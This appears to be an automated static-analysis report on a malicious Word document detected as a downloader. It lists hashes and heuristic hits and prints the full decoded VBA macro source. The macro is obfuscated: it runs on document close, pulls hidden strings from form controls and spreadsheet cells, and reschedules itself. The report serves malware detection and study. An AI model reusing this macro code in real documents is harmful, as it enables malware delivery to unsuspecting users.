Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d5dd63d1560d4ec3…

MALICIOUS

Office (OOXML)

83.2 KB Created: 2021-01-29 10:38:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-02-09
MD5: 57eeeb84020fed7a3a6889f6756baded SHA-1: 2b0ad60dcc34064781057f3fcfdc48810af4124f SHA-256: d5dd63d1560d4ec30642c5b6c489980e93be1a0da160961582e4f784b86d5a5c
222 Risk Score

Heuristics 5

  • ClamAV: Doc.Downloader.Valyria-10033915-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-10033915-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set oa = CreateObject(UserForm1.o4 & UserForm1.bp)
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Set sv4 = CallByName(oa.Workbooks, UserForm1.ie & UserForm1.nz, 1, UserForm2.ComboBox1, , , , UserForm1.wb)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 7235 bytes
SHA-256: b0184b07a7fff6824b3b4ddfcb04ea9e7dab58a5ddb79d10090056b9595c8cd3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Public gf, dq, a1, spw, n6, oa, it, pf, x, hl, aa, dx, ia, kt, f1, y66

Sub Document_Close()

dz

mh = UserForm2.ComboBox20

End Sub

Sub dz()

On Error Resume Next

UserForm2.ComboBox1.ListIndex = 5

Set oa = CreateObject(UserForm1.o4 & UserForm1.bp)

oa.DisplayAlerts = False

qi = 1301

jo = 0

Err.Number = 0

While qi <> 0 And jo < 32

Set sv4 = CallByName(oa.Workbooks, UserForm1.ie & UserForm1.nz, 1, UserForm2.ComboBox1, , , , UserForm1.wb)

qi = Err.Number

jo = jo + 16

Wend

If qi <> 0 Then

q9 = UserForm2.ComboBox23

ErrHandler:

vp = CallByName(Application, UserForm1.k8 & UserForm1.ay, 2)

If vp <> False Then

Set ja = CreateObject(UserForm1.qh & UserForm1.k5)

CallByName ja.Documents, UserForm1.ie & UserForm1.nz, 1, ActiveDocument.FullName, , True

lx = UserForm2.ComboBox28

CallByName ja, UserForm1.ujr & UserForm1.g8, 1, Now + TimeSerial(0, 0, 2), UserForm1.kj & UserForm1.pb & "dz"

Else

CallByName Application, UserForm1.ujr & UserForm1.g8, 1, Now + TimeSerial(0, 0, 17), UserForm1.kj & UserForm1.pb & "dz"

End If

oa.Quit

Exit Sub

End If

Dim w

Set w = oa.sheets(1)

v9 = "'"

y66 = oa.sheets(5).Cells(1, 1)

e8 = UserForm2.ComboBox27

If Len(y66) < 1 Then

If oa.ActiveWorkbook.Title <> "Google" Then

GoTo ErrHandler

dy = UserForm2.ComboBox9

Else

lg = UserForm2.ComboBox21

Exit Sub

End If

End If

g6 = oa.sheets(1).Cells(24, 12).Value

e1 = w.Cells(52, 11).Value

hl = oa.sheets(1).Cells(123, 18).Value

aa = oa.sheets(2).Cells(148, 17).Value

n6 = oa.sheets(2).Cells(113, 7).Value

p3 = UserForm2.ComboBox7

wv = oa.sheets(2).Cells(24, 42).Value

pd = oa.sheets(1).Cells(36, 34).Value

cp = oa.sheets(3).Cells(118, 4).Value

i0 = oa.sheets(2).Cells(101, 23).Value

m2 = oa.sheets(1).Cells(138, 35).Value

ia = oa.sheets(2).Cells(126, 10).Value

it = w.Cells(74, 42).Value

x = oa.sheets(3).Cells(62, 30).Value

r7 = oa.sheets(3).Cells(38, 31).Value

fd = UserForm2.ComboBox12

mn = oa.sheets(2).Cells(148, 40).Value

he = UserForm2.ComboBox20

dx = oa.sheets(1).Cells(42, 24).Value

bu = w.Cells(149, 47).Value

gg = UserForm2.ComboBox5

op = oa.sheets(2).Cells(145, 35).Value

gf = oa.sheets(3).Cells(53, 56).Value

os = oa.sheets(3).Cells(93, 33).Value

b9 = w.Cells(65, 24).Value

pf = oa.sheets(3).Cells(22, 10).Value

dq = oa.sheets(3).Cells(140, 55).Value

h1 = UserForm2.ComboBox19

gx = oa.sheets(3).Cells(56, 26).Value

tf3 = oa.sheets(2).Cells(149, 44).Value

f7 = UserForm2.ComboBox6

f1 = ""

Set Sh1 = oa.sheets(4)

rh = 1

np = UserForm2.ComboBox25

le = True

p9 = UserForm2.ComboBox23

While le

t = Sh1.Cells(rh, 1).Value

If Len(t) < 1 Then

le = False

Else

f1 = f1 & t

End If

rh = rh + 1

Wend

a3 = CallByName(oa, m2, 2)

dd = UserForm2.ComboBox11

UserForm1.r6.Value = pd & a3 & op

o8 = UserForm2.ComboBox7

w1 = UserForm2.ComboBox24

fy = UserForm2.ComboBox28

UserForm1.iob.Value = e1

hn = UserForm2.ComboBox15

CallByName CreateObject(tf3), b9, 1, UserForm1.r6, bu, UserForm1.iob

r = UserForm2.ComboBox8

Set h9 = CreateObject(g6)

ov = UserForm2.ComboBox27

Set lr = CallByName(h9, wv, 2)

Set tfp = CallByName(lr, gx, 1)

jw = UserForm2.ComboBox18

Set x = CallByName(h9, x, 2)

Set spw = h9

UserForm5.ComboBox1 = "zph"

Set gf = CallByName(kt, gf, 2)

oy = UserForm2.ComboBox12

pf = CallByName(gf, pf, 2)

ro = UserForm2.ComboBox9

UserForm1.ph.Value = os & cp

UserForm3.ComboBox1 = i0

UserForm1.ph.Value = r7

UserForm4.ComboBox1 = UserForm3.ComboBox1

UserForm3.ComboBox1 = pf

h9 = ma

sv4 = l2

w = c2

lr = l8

tfp = i7

kd = UserForm2.ComboBox12

x = hk

hl = rd

aa = el

kt = ld

gf = ji

cl = UserForm2.ComboBox20

ef = UserForm2.ComboBox20

spw = lk

DoEvents

CallByName oa, mn, 1

oa = yi

hp = UserForm2.ComboBox25

c3 = UserForm2.ComboBox23

End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{AA8E5D02-2B68-4D54-B866-3987E8390B18}{7A08AD09-F346-4EE1-824E-2EC2DA99146D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{F772E07B-D87B-4C06-902E-5E516F085D9A}{D1E7D319-1078-46D0-8514-6C31523AFEDB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 
 

 bg = UserForm2.Controls.Count - 1
 
 
 
 

 om = ""
 For jc = 1 To bg Step 2
 om = om & UserForm2.Controls.Item(jc)
 Next

 ComboBox1.AddItem "f8"
 ComboBox1.AddItem "zg"

hw = UserForm2.ComboBox20

 ComboBox1.AddItem "ei"
 ComboBox1.AddItem "ed"
 ComboBox1.AddItem "i3"
 ComboBox1.AddItem om
 ComboBox1.AddItem "gz"

fj = UserForm2.ComboBox14

 
 
 
 
 
 

oo = UserForm2.ComboBox11

 
End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{91D9ADBA-F64E-4158-A279-DFB482AB0959}{17DAACFE-6B1C-46F5-84D4-D1279B7219DC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.gf, ActiveDocument.it, VbMethod, 1, ActiveDocument.pf

pe = UserForm2.ComboBox11

 CallByName ActiveDocument.gf, ActiveDocument.dq, VbMethod, UserForm1.ph.Value
End Sub

 

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{C6E2B6B1-D6D9-41AA-A58A-624099BCB16E}{E0F480B5-BBE7-4CFA-BB82-6F59426D3EAD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.spw, ActiveDocument.n6, VbMethod, UserForm1.ph.Value, ActiveDocument.f1, ActiveDocument.y66
End Sub

 

Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{530EB92D-967B-4284-B0CF-216C9B5626C4}{FB1E2BBE-3392-475A-89DE-A702E41BA958}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 Set ActiveDocument.hl = CallByName(ActiveDocument.x, ActiveDocument.hl, VbGet)
 Set ActiveDocument.aa = CallByName(ActiveDocument.hl, ActiveDocument.aa, VbGet)
 Set ActiveDocument.kt = CallByName(ActiveDocument.aa, ActiveDocument.dx, VbMethod, ActiveDocument.ia)
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 51200 bytes
SHA-256: 5db8f30ccae49c184df1f757726b325c998ec1ed6752b5bd0018d63af6a7ef7d
Detection
ClamAV: Doc.Downloader.Valyria-10033915-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.